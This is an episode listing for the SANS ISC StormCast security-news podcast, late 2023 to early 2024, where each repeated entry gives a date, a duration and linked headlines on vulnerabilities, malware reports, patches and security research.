Interesting large and small malspam attachments from 2023 https://isc.sans.edu/diary/Interesting%20large%20and%20small%20malspam%20attachments%20from%202023/30524 Orange Spain RIPE Account Compromise https://www.bleepingcomputer.com/news/security/hacker-hijacks-orange-spain-ripe-account-to-cause-bgp-havoc/ Bitwarden Heist https://blog.redteam-pentesting.de/2024/bitwarden-heist/ Apple iOS PoC Exploits https://github.com/felix-pb/kfd/blob/main/writeups/smith.md https://github.com/felix-pb/kfd/blob/main/writeups/landa.md
1/4/20246 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, January 4th, 2024

Interesting large and small malspam attachments from 2023 https://isc.sans.edu/diary/Interesting%20large%20and%20small%20malspam%20attachments%20from%202023/30524 Orange Spain RIPE Account Compromise https://www.bleepingcomputer.com/news/security/hacker-hijacks-orange-spain-ripe-account-to-cause-bgp-havoc/ Bitwarden Heist https://blog.redteam-pentesting.de/2024/bitwarden-heist/ Apple iOS PoC Exploits https://github.com/felix-pb/kfd/blob/main/writeups/smith.md https://github.com/felix-pb/kfd/blob/main/writeups/landa.md
1/4/20246 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, January 3rd, 2024

Fingerprinting SSH Identification Strings https://isc.sans.edu/diary/Fingerprinting%20SSH%20Identification%20Strings/30520 Google OAUTH2 Exploited by Malware https://www.cloudsek.com/blog/compromising-google-accounts-malwares-exploiting-undocumented-oauth2-functionality-for-session-hijacking TsuKing DNS Amplification https://lixiang521.com/publication/ccs23/ccs23-xu-tsuking.pdf
1/3/20248 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, January 3rd, 2024

Fingerprinting SSH Identification Strings https://isc.sans.edu/diary/Fingerprinting%20SSH%20Identification%20Strings/30520 Google OAUTH2 Exploited by Malware https://www.cloudsek.com/blog/compromising-google-accounts-malwares-exploiting-undocumented-oauth2-functionality-for-session-hijacking TsuKing DNS Amplification https://lixiang521.com/publication/ccs23/ccs23-xu-tsuking.pdf
1/3/20248 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, January 2nd, 2024

Shall We Play a Game https://isc.sans.edu/diary/Shall+We+Play+a+Game/30510 Mailtrap.io Exfiltration https://isc.sans.edu/diary/Python%20Keylogger%20Using%20Mailtrap.io/30512 Pi Hole Docker https://isc.sans.edu/forums/diary/Pi-Hole%20Pi4%20Docker%20Deployment/30516/ Mirai Update https://isc.sans.edu/diary/Unveiling%20the%20Mirai%3A%20Insights%20into%20Recent%20DShield%20Honeypot%20Activity%20%5BGuest%20Diary%5D/30514 Barracuda 0-Day Vulnerability https://www.barracuda.com/company/legal/esg-vulnerability Apache OFBiz 0-Day Exploited against Atlassian (and possibly others) https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/
1/2/20246 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, January 2nd, 2024

Shall We Play a Game https://isc.sans.edu/diary/Shall+We+Play+a+Game/30510 Mailtrap.io Exfiltration https://isc.sans.edu/diary/Python%20Keylogger%20Using%20Mailtrap.io/30512 Pi Hole Docker https://isc.sans.edu/forums/diary/Pi-Hole%20Pi4%20Docker%20Deployment/30516/ Mirai Update https://isc.sans.edu/diary/Unveiling%20the%20Mirai%3A%20Insights%20into%20Recent%20DShield%20Honeypot%20Activity%20%5BGuest%20Diary%5D/30514 Barracuda 0-Day Vulnerability https://www.barracuda.com/company/legal/esg-vulnerability Apache OFBiz 0-Day Exploited against Atlassian (and possibly others) https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/
1/2/20246 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, December 22nd, 2023

Securing Web Servers https://isc.sans.edu/diary/How%20to%20Protect%20your%20Webserver%20from%20Directory%20Enumeration%20Attack%20%3F%20Apache2%20%5BGuest%20Diary%5D/30504 Chrome 0-Day (last one for the year?) https://chromereleases.googleblog.com/2023/12/stable-channel-update-for-desktop_20.html Note that there will be no daily stormcast for the rest of the year. Returning January 2nd SANS Cloud Defender 2024 https://www.sans.org/cyber-security-training-events/cloud-defender-2024-live-online/
12/22/20234 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, December 22nd, 2023

Securing Web Servers https://isc.sans.edu/diary/How%20to%20Protect%20your%20Webserver%20from%20Directory%20Enumeration%20Attack%20%3F%20Apache2%20%5BGuest%20Diary%5D/30504 Chrome 0-Day (last one for the year?) https://chromereleases.googleblog.com/2023/12/stable-channel-update-for-desktop_20.html Note that there will be no daily stormcast for the rest of the year. Returning January 2nd SANS Cloud Defender 2024 https://www.sans.org/cyber-security-training-events/cloud-defender-2024-live-online/
12/22/20234 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, December 21st, 2023

Increase in Exploit Attempts for Atlassian Confluence Server (CVE-2023-22518) https://isc.sans.edu/diary/Increase%20in%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20Server%20%28CVE-2023-22518%29/30502 Fake F5 BigIP Update https://www.bleepingcomputer.com/news/security/fake-f5-big-ip-zero-day-warning-emails-push-data-wipers/ Google OAUTH Problems https://trufflesecurity.com/blog/google-oauth-is-broken-sort-of/ Remembering Adrien de Beaupre https://www.hpmcgarry.ca/memorials/ernest-adrien-de-beaupre/5344136/index.php
12/21/20237 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, December 21st, 2023

Increase in Exploit Attempts for Atlassian Confluence Server (CVE-2023-22518) https://isc.sans.edu/diary/Increase%20in%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20Server%20%28CVE-2023-22518%29/30502 Fake F5 BigIP Update https://www.bleepingcomputer.com/news/security/fake-f5-big-ip-zero-day-warning-emails-push-data-wipers/ Google OAUTH Problems https://trufflesecurity.com/blog/google-oauth-is-broken-sort-of/ Remembering Adrien de Beaupre https://www.hpmcgarry.ca/memorials/ernest-adrien-de-beaupre/5344136/index.php
12/21/20237 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, December 20th, 2023

What are they looking for? Scans for OpenID Connect Configuration https://isc.sans.edu/diary/What%20are%20they%20looking%20for%3F%20Scans%20for%20OpenID%20Connect%20Configuration%20%28Update%3A%20CitrixBleed%29/30498 Terrapin Attack Against SSH https://terrapin-attack.com/TerrapinAttack.pdf ALPHV/Blackcat Ransomware Disrupted and Decryptor Available https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant
12/20/20236 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, December 20th, 2023

What are they looking for? Scans for OpenID Connect Configuration https://isc.sans.edu/diary/What%20are%20they%20looking%20for%3F%20Scans%20for%20OpenID%20Connect%20Configuration%20%28Update%3A%20CitrixBleed%29/30498 Terrapin Attack Against SSH https://terrapin-attack.com/TerrapinAttack.pdf ALPHV/Blackcat Ransomware Disrupted and Decryptor Available https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant
12/20/20236 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, December 19th, 2023

SMTP Smuggling - Spoofing E-Mails Worldwide https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/ Ledger Supply Chain Attack https://www.ledger.com/blog/a-letter-from-ledger-chairman-ceo-pascal-gauthier-regarding-ledger-connect-kit-exploit December Windows 11 Patch Breacks Wi-Fi Connectivity https://www.bleepingcomputer.com/news/microsoft/decembers-windows-11-kb5033375-update-breaks-wi-fi-connectivity/
12/19/20236 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, December 19th, 2023

SMTP Smuggling - Spoofing E-Mails Worldwide https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/ Ledger Supply Chain Attack https://www.ledger.com/blog/a-letter-from-ledger-chairman-ceo-pascal-gauthier-regarding-ledger-connect-kit-exploit December Windows 11 Patch Breacks Wi-Fi Connectivity https://www.bleepingcomputer.com/news/microsoft/decembers-windows-11-kb5033375-update-breaks-wi-fi-connectivity/
12/19/20236 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, December 18th, 2023

An Example of a RocketMQ Exploit Scanner https://isc.sans.edu/diary/An%20Example%20of%20RocketMQ%20Exploit%20Scanner/30492 C# Payload Phoning to a Cobalt Strike Server https://isc.sans.edu/diary/CSharp%20Payload%20Phoning%20to%20a%20CobaltStrike%20Server/30490 3CX SQL Injection Vulnerability https://www.3cx.com/blog/news/sql-database-integration/ QNAP Viostor 0-Day Vulnerablity https://www.akamai.com/blog/security-research/qnap-viostor-zero-day-vulnerability-spreading-mirai-patched PFSense Vulnerability https://www.sonarsource.com/blog/pfsense-vulnerabilities-sonarcloud/ SANS Holiday Hack Challenge https://sans.org/holidayhack
12/18/202310 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, December 18th, 2023

An Example of a RocketMQ Exploit Scanner https://isc.sans.edu/diary/An%20Example%20of%20RocketMQ%20Exploit%20Scanner/30492 C# Payload Phoning to a Cobalt Strike Server https://isc.sans.edu/diary/CSharp%20Payload%20Phoning%20to%20a%20CobaltStrike%20Server/30490 3CX SQL Injection Vulnerability https://www.3cx.com/blog/news/sql-database-integration/ QNAP Viostor 0-Day Vulnerablity https://www.akamai.com/blog/security-research/qnap-viostor-zero-day-vulnerability-spreading-mirai-patched PFSense Vulnerability https://www.sonarsource.com/blog/pfsense-vulnerabilities-sonarcloud/ SANS Holiday Hack Challenge https://sans.org/holidayhack
12/18/202310 minutes, 19 seconds
Episode Artwork

ISC StormCast for Friday, December 15th, 2023

T-shooting Terraform for DShield Honeypot in Azure https://isc.sans.edu/diary/T-shooting%20Terraform%20for%20DShield%20Honeypot%20in%20Azure%20%5BGuest%20Diary%5D/30484 Ubiquity Unifi Cameras Visible in Wrong Account https://community.ui.com/questions/Bug-Fix-Cloud-Access-Misconfiguration/fe8d4479-e187-4471-bf95-b2799183ceb7 Zoom Vulnerabilities and VISS https://viss.zoom.com/specifications https://www.zoom.com/en/trust/security-bulletin/ Squid Denial of Service Vulnerability https://www.zoom.com/en/trust/security-bulletin/
12/15/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, December 15th, 2023

T-shooting Terraform for DShield Honeypot in Azure https://isc.sans.edu/diary/T-shooting%20Terraform%20for%20DShield%20Honeypot%20in%20Azure%20%5BGuest%20Diary%5D/30484 Ubiquity Unifi Cameras Visible in Wrong Account https://community.ui.com/questions/Bug-Fix-Cloud-Access-Misconfiguration/fe8d4479-e187-4471-bf95-b2799183ceb7 Zoom Vulnerabilities and VISS https://viss.zoom.com/specifications https://www.zoom.com/en/trust/security-bulletin/ Squid Denial of Service Vulnerability https://github.com/squid-cache/squid/security/advisories/GHSA-wgq4-4cfg-c4x3
12/15/20235 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, December 14th, 2023

Malicious Python Script with a TCL/TK GUI https://isc.sans.edu/diary/Malicious%20Python%20Script%20with%20a%20TCL%20TK%20GUI/30478 Adobe Updates https://helpx.adobe.com/security/security-bulletin.html TeamCity Exploited https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a Sophos Firewall Exploit for EOL Devices CVE-2022-3236 https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce
12/14/20235 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, December 14th, 2023

Malicious Python Script with a TCL/TK GUI https://isc.sans.edu/diary/Malicious%20Python%20Script%20with%20a%20TCL%20TK%20GUI/30478 Adobe Updates https://helpx.adobe.com/security/security-bulletin.html TeamCity Exploited https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a Sophos Firewall Exploit for EOL Devices CVE-2022-3236 https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce
12/14/20235 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, December 13th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20December%202023/30480 Microsoft Warns of Malicious OAUTH Applications https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/ Apache Struts2 Exploit CVE-2023-50164 https://xz.aliyun.com/t/13172
12/13/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, December 13th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20December%202023/30480 Microsoft Warns of Malicious OAUTH Applications https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/ Apache Struts2 Exploit CVE-2023-50164 https://xz.aliyun.com/t/13172
12/13/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, December 12th, 2023

What is Sitemap.xml and Why a Pentester Should Care https://isc.sans.edu/diary/What%20is%20sitemap.xml%2C%20and%20Why%20a%20Pentester%20Should%20Care/30472 Apple Patches Everything https://isc.sans.edu/forums/diary/Apple%20Patches%20Everything/30474/ Android Password Manager Auto Spill https://i.blackhat.com/EU-23/Presentations/EU-23-Gangwal-AutoSpill-Zero-Effort-Credential-Stealing.pdf
12/12/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, December 12th, 2023

What is Sitemap.xml and Why a Pentester Should Care https://isc.sans.edu/diary/What%20is%20sitemap.xml%2C%20and%20Why%20a%20Pentester%20Should%20Care/30472 Apple Patches Everything https://isc.sans.edu/forums/diary/Apple%20Patches%20Everything/30474/ Android Password Manager Auto Spill https://i.blackhat.com/EU-23/Presentations/EU-23-Gangwal-AutoSpill-Zero-Effort-Credential-Stealing.pdf
12/12/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, December 11th, 2023

IPv4 Mapped IPv6 Addresses https://isc.sans.edu/diary/IPv4-mapped%20IPv6%20Address%20Used%20For%20Obfuscation/30466 Honeypots From the Skeptical Beginner to the Tactical Enthusiast https://isc.sans.edu/diary/Honeypots%3A%20From%20the%20Skeptical%20Beginner%20to%20the%20Tactical%20Enthusiast/30468 Bluetooth Weakness CVE-2023-45866 https://github.com/skysafe/reblog/tree/main/cve-2023-45866 Syrus 4 IoT Gateway Vulnerability CVE-2023-6248 https://socradar.io/syrus4-iot-gateway-vulnerability-could-allow-code-execution-on-thousands-of-vehicles-simultaneously-cve-2023-6248/ Microsoft Edge Vulnerability CVE-2023-35618 https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security#december-7-2023
12/11/20236 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, December 11th, 2023

IPv4 Mapped IPv6 Addresses https://isc.sans.edu/diary/IPv4-mapped%20IPv6%20Address%20Used%20For%20Obfuscation/30466 Honeypots From the Skeptical Beginner to the Tactical Enthusiast https://isc.sans.edu/diary/Honeypots%3A%20From%20the%20Skeptical%20Beginner%20to%20the%20Tactical%20Enthusiast/30468 Bluetooth Weakness CVE-2023-45866 https://github.com/skysafe/reblog/tree/main/cve-2023-45866 Syrus 4 IoT Gateway Vulnerability CVE-2023-6248 https://socradar.io/syrus4-iot-gateway-vulnerability-could-allow-code-execution-on-thousands-of-vehicles-simultaneously-cve-2023-6248/ Microsoft Edge Vulnerability CVE-2023-35618 https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security#december-7-2023
12/11/20236 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, December 8th, 2023

5G Vulnerabilities https://isc.sans.edu/diary/5Ghoul%3A%20Impacts%2C%20Implications%20and%20Next%20Steps/30462 Revealing the hidden Risks of QR Codes https://isc.sans.edu/diary/Revealing%20the%20Hidden%20Risks%20of%20QR%20Codes%20%5BGuest%20Diary%5D/30458 Window 10 End of Support https://techcommunity.microsoft.com/t5/windows-it-pro-blog/plan-for-windows-10-eos-with-windows-11-windows-365-and-esu/ba-p/4000414 Apache Struts 2 Vulnerability CVE-2023-50164 https://cwiki.apache.org/confluence/display/WW/S2-066
12/8/20236 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, December 8th, 2023

5G Vulnerabilities https://isc.sans.edu/diary/5Ghoul%3A%20Impacts%2C%20Implications%20and%20Next%20Steps/30462 Revealing the hidden Risks of QR Codes https://isc.sans.edu/diary/Revealing%20the%20Hidden%20Risks%20of%20QR%20Codes%20%5BGuest%20Diary%5D/30458 Window 10 End of Support https://techcommunity.microsoft.com/t5/windows-it-pro-blog/plan-for-windows-10-eos-with-windows-11-windows-365-and-esu/ba-p/4000414 Apache Struts 2 Vulnerability CVE-2023-50164 https://cwiki.apache.org/confluence/display/WW/S2-066
12/8/20236 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, December 7th, 2023

Whose packet is is anyway: a new RFC for attribution of internet probes https://isc.sans.edu/forums/diary/Whose%20packet%20is%20it%20anyway%3A%20a%20new%20RFC%20for%20attribution%20of%20internet%20probes/30456/ MLFlow Vulnerability https://www.contrastsecurity.com/security-influencers/discovering-mlflow-framework-zero-day-vulnerability-machine-language-model-security-contrast-security https://mlflow.org/category/news/index.html Abusing STS Tokens https://redcanary.com/blog/aws-sts/ Atlasian Vulnerabilities https://confluence.atlassian.com/security/security-advisories-bulletins-1236937381.html Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge-2023/
12/7/20235 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, December 7th, 2023

Whose packet is is anyway: a new RFC for attribution of internet probes https://isc.sans.edu/forums/diary/Whose%20packet%20is%20it%20anyway%3A%20a%20new%20RFC%20for%20attribution%20of%20internet%20probes/30456/ MLFlow Vulnerability https://www.contrastsecurity.com/security-influencers/discovering-mlflow-framework-zero-day-vulnerability-machine-language-model-security-contrast-security https://mlflow.org/category/news/index.html Abusing STS Tokens https://redcanary.com/blog/aws-sts/ Atlasian Vulnerabilities https://confluence.atlassian.com/security/security-advisories-bulletins-1236937381.html Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge-2023/
12/7/20235 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, December 6th, 2023

Cobalt Strike's "Runtime Configuration" https://isc.sans.edu/diary/Cobalt%20Strike%27s%20%22Runtime%20Configuration%22/30426 Adobe ColdFusion Exploit Abused https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-339a Atos Unify OpenScape Vulnerability https://sec-consult.com/vulnerability-lab/advisory/argument-injection-vulnerability-in-multiple-atos-unify-openscape-products/ ExtremeXOS Vulnerabilities https://rhinosecuritylabs.com/research/extreme-networks-extremexos-vulnerabilities/
12/6/20235 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, December 6th, 2023

Cobalt Strike's "Runtime Configuration" https://isc.sans.edu/diary/Cobalt%20Strike%27s%20%22Runtime%20Configuration%22/30426 Adobe ColdFusion Exploit Abused https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-339a Atos Unify OpenScape Vulnerability https://sec-consult.com/vulnerability-lab/advisory/argument-injection-vulnerability-in-multiple-atos-unify-openscape-products/ ExtremeXOS Vulnerabilities https://rhinosecuritylabs.com/research/extreme-networks-extremexos-vulnerabilities/
12/6/20235 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, December 5th, 2023

Zarya Hacktivists: More than just Sharepoint https://isc.sans.edu/diary/Zarya%20Hacktivists%3A%20More%20than%20just%20Sharepoint./30450 ICANN Registration Data Request Service (RDRS) https://rdrs.icann.org/ Android Updates https://source.android.com/docs/security/bulletin/2023-12-01 GitLab Patches https://about.gitlab.com/releases/2023/11/30/security-release-gitlab-16-6-1-released/
12/5/20236 minutes
Episode Artwork

ISC StormCast for Tuesday, December 5th, 2023

Zarya Hacktivists: More than just Sharepoint https://isc.sans.edu/diary/Zarya%20Hacktivists%3A%20More%20than%20just%20Sharepoint./30450 ICANN Registration Data Request Service (RDRS) https://rdrs.icann.org/ Android Updates https://source.android.com/docs/security/bulletin/2023-12-01 GitLab Patches https://about.gitlab.com/releases/2023/11/30/security-release-gitlab-16-6-1-released/
12/5/20236 minutes
Episode Artwork

ISC StormCast for Monday, December 4th, 2023

UEFI Exploit via Boot Image https://binarly.io/posts/The_Far_Reaching_Consequences_of_LogoFAIL/index.html Fake Phishing Scan Tricks Users into Installing Backdoor Plugin https://www.wordfence.com/blog/2023/12/psa-fake-cve-2023-45124-phishing-scam-tricks-users-into-installing-backdoor-plugin/ Qlik Sense Exploited by Cactus Ransomware https://arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/ https://www.praetorian.com/blog/qlik-sense-technical-exploit/ VMWare Vulnerability Patched https://www.vmware.com/security/advisories/VMSA-2023-0026.html
12/4/20236 minutes, 1 second
Episode Artwork

ISC StormCast for Monday, December 4th, 2023

UEFI Exploit via Boot Image https://binarly.io/posts/The_Far_Reaching_Consequences_of_LogoFAIL/index.html Fake Phishing Scan Tricks Users into Installing Backdoor Plugin https://www.wordfence.com/blog/2023/12/psa-fake-cve-2023-45124-phishing-scam-tricks-users-into-installing-backdoor-plugin/ Qlik Sense Exploited by Cactus Ransomware https://arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/ https://www.praetorian.com/blog/qlik-sense-technical-exploit/ VMWare Vulnerability Patched https://www.vmware.com/security/advisories/VMSA-2023-0026.html
12/4/20236 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, December 1st, 2023

Apple Updates https://isc.sans.edu/diary/Apple+Patches+Exploited+WebKit+Vulnerabilitiues+in+iOSiPadOSmacOS/30444 Prophetic Post by Intern on CVE-2023-1389 Foreshadows Mirai Botnet Expansion Today https://isc.sans.edu/forums/diary/Prophetic+Post+by+Intern+on+CVE20231389+Foreshadows+Mirai+Botnet+Expansion+Today/30442/ Zyxel Vulnerabilities https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-authentication-bypass-and-command-injection-vulnerabilities-in-nas-products Solarwinds Update https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2023-4_release_notes.htm#link3 DNS Looking Glass https://isc.sans.edu/tools/dnslookup/
12/1/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, December 1st, 2023

Apple Updates https://isc.sans.edu/diary/Apple+Patches+Exploited+WebKit+Vulnerabilitiues+in+iOSiPadOSmacOS/30444 Prophetic Post by Intern on CVE-2023-1389 Foreshadows Mirai Botnet Expansion Today https://isc.sans.edu/forums/diary/Prophetic+Post+by+Intern+on+CVE20231389+Foreshadows+Mirai+Botnet+Expansion+Today/30442/ Zyxel Vulnerabilities https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-authentication-bypass-and-command-injection-vulnerabilities-in-nas-products Solarwinds Update https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2023-4_release_notes.htm#link3 DNS Looking Glass https://isc.sans.edu/tools/dnslookup/
12/1/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, November 30th, 2023

Decoding the Patterns: Analzying DShield Honeypot Activity https://isc.sans.edu/diary/Decoding%20the%20Patterns%3A%20Analyzing%20DShield%20Honeypot%20Activity%20%5BGuest%20Diary%5D/30428 Arcserve Unified Data Protection Multiple Vulnerabilities https://www.tenable.com/security/research/tra-2023-37 Hikvision Vulnerabilities https://www.hikvision.com/hk/support/cybersecurity/security-advisory/security-vulnerability-in-some-hikvision-products/ Assessing Prompt Injection Risks in 200+ Custom GPTs https://arxiv.org/pdf/2311.11538.pdf
11/30/20235 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, November 30th, 2023

Decoding the Patterns: Analzying DShield Honeypot Activity https://isc.sans.edu/diary/Decoding%20the%20Patterns%3A%20Analyzing%20DShield%20Honeypot%20Activity%20%5BGuest%20Diary%5D/30428 Arcserve Unified Data Protection Multiple Vulnerabilities https://www.tenable.com/security/research/tra-2023-37 Hikvision Vulnerabilities https://www.hikvision.com/hk/support/cybersecurity/security-advisory/security-vulnerability-in-some-hikvision-products/ Assessing Prompt Injection Risks in 200+ Custom GPTs https://arxiv.org/pdf/2311.11538.pdf
11/30/20235 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, November 29th, 2023

Pro-Russian Attackers Scanning for Sharepoint Servers to Exploit CVE-2023-29357 https://isc.sans.edu/diary/Pro%20Russian%20Attackers%20Scanning%20for%20Sharepoint%20Servers%20to%20Exploit%20CVE-2023-29357/30436 Microsoft Deprecates Microsoft Defender Application Guard for Office https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features Synology Vulnerability https://www.synology.com/en-global/security/advisory/Synology_SA_23_16 Apache Tomcat Request Smuggling Vulnerability CVE-2023-46589 https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr
11/29/20235 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, November 29th, 2023

Pro-Russian Attackers Scanning for Sharepoint Servers to Exploit CVE-2023-29357 https://isc.sans.edu/diary/Pro%20Russian%20Attackers%20Scanning%20for%20Sharepoint%20Servers%20to%20Exploit%20CVE-2023-29357/30436 Microsoft Deprecates Microsoft Defender Application Guard for Office https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features Synology Vulnerability https://www.synology.com/en-global/security/advisory/Synology_SA_23_16 Apache Tomcat Request Smuggling Vulnerability CVE-2023-46589 https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr
11/29/20235 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, November 28th, 2023

Scans for ownCloud Vulnerability (CVE-2023-49103) https://isc.sans.edu/diary/Scans%20for%20ownCloud%20Vulnerability%20%28CVE-2023-49103%29/30432 Windows Hello Fingerprint Reader Weakness https://blackwinghq.com/blog/posts/a-touch-of-pwn-part-i/
11/28/20236 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, November 28th, 2023

Scans for ownCloud Vulnerability (CVE-2023-49103) https://isc.sans.edu/diary/Scans%20for%20ownCloud%20Vulnerability%20%28CVE-2023-49103%29/30432 Windows Hello Fingerprint Reader Weakness https://blackwinghq.com/blog/posts/a-touch-of-pwn-part-i/
11/28/20236 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, November 27th, 2023

DShield Birthday https://isc.sans.edu/diary/Happy%20Birthday%20DShield/30420 Mirai uses CVE-2023-1389 https://isc.sans.edu/diary/CVE-2023-1389%3A%20A%20New%20Means%20to%20Expand%20Botnets/30418 More Mirai Vulnerabilities https://www.akamai.com/blog/security-research/new-rce-botnet-spreads-mirai-via-zero-days Analyzing OVA Files https://isc.sans.edu/diary/OVA%20Files/30424 Static Code Injections in OpenCart (CVE-2023-47444) https://github.com/opencart/opencart/issues/12947 Holiday Hackchallenge https://www.sans.org/mlp/holiday-hack-challenge-2023/
11/27/20236 minutes, 1 second
Episode Artwork

ISC StormCast for Monday, November 27th, 2023

DShield Birthday https://isc.sans.edu/diary/Happy%20Birthday%20DShield/30420 Mirai uses CVE-2023-1389 https://isc.sans.edu/diary/CVE-2023-1389%3A%20A%20New%20Means%20to%20Expand%20Botnets/30418 More Mirai Vulnerabilities https://www.akamai.com/blog/security-research/new-rce-botnet-spreads-mirai-via-zero-days Analyzing OVA Files https://isc.sans.edu/diary/OVA%20Files/30424 Static Code Injections in OpenCart (CVE-2023-47444) https://github.com/opencart/opencart/issues/12947 Holiday Hackchallenge https://www.sans.org/mlp/holiday-hack-challenge-2023/
11/27/20236 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, November 17th, 2023

Beyond -n: Optimizign tcpdump performance https://isc.sans.edu/forums/diary/Beyond%20-n%3A%20Optimizing%20tcpdump%20performance/30408/ Zimbra 0-day used to target international government organizations https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/ FortiSIEM OS command injection in Report Server https://www.fortiguard.com/psirt/FG-IR-23-135 AI Exploit Collection https://github.com/protectai/ai-exploits CrushFTP Remote Code Execution https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/ Scott Poley: The Cyber Date Paradox: Storing Less, Discovering More https://www.sans.edu/cyber-research/cyber-data-paradox-storing-less-discovering-more/
11/17/202315 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, November 17th, 2023

Beyond -n: Optimizign tcpdump performance https://isc.sans.edu/forums/diary/Beyond%20-n%3A%20Optimizing%20tcpdump%20performance/30408/ Zimbra 0-day used to target international government organizations https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/ FortiSIEM OS command injection in Report Server https://www.fortiguard.com/psirt/FG-IR-23-135 AI Exploit Collection https://github.com/protectai/ai-exploits CrushFTP Remote Code Execution https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/ Scott Poley: The Cyber Date Paradox: Storing Less, Discovering More https://www.sans.edu/cyber-research/cyber-data-paradox-storing-less-discovering-more/
11/17/202315 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, November 16th, 2023

Redline Dropped Through MSIX Package https://isc.sans.edu/diary/Redline%20Dropped%20Through%20MSIX%20Package/30404 ChatGPT Code Interpreter Security Hole https://www.tomshardware.com/news/chatgpt-code-interpreter-security-hole Directory Traversal in Reactor Netty CVE-2023-34062 https://spring.io/security/cve-2023-34062 Aruba Networking Product Vulnerabilities https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-017.txt HARArmor https://harmor.dev/
11/16/20235 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, November 16th, 2023

